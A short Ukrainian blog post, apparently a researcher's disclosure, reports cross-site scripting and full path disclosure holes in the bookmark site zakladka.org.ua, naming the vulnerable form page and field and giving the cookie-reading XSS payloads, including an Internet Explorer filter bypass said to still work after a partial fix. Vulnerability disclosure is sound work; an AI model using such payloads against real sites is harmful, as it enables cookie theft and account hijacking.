Уразливості на zakladka.org.ua
19:41 30.01.200826.02.2007
Ще в вересні, 29.09.2006 (трохи відклалося з цим анонсом), я знайшов Cross-Site Scripting та Full path disclosure уразливості на популярному проекті http://zakladka.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
30.01.2008
XSS:
POST запит на сторінці http://zakladka.org.ua/add.html
<script>alert(document.cookie)<script>
В полі: Подай URL сторінки.
Full path disclosure:
Такий самий POST запит на сторінці http://zakladka.org.ua/add.html.
Дані уразливості вже виправлені. Але XSS дірка виправлена не повністю і при невеликій модифікації знову працює.
XSS:
POST запит на сторінці http://zakladka.org.ua/add.html (для IE)
" style="xss:expression(alert(document.cookie))
В полі: Подай URL сторінки.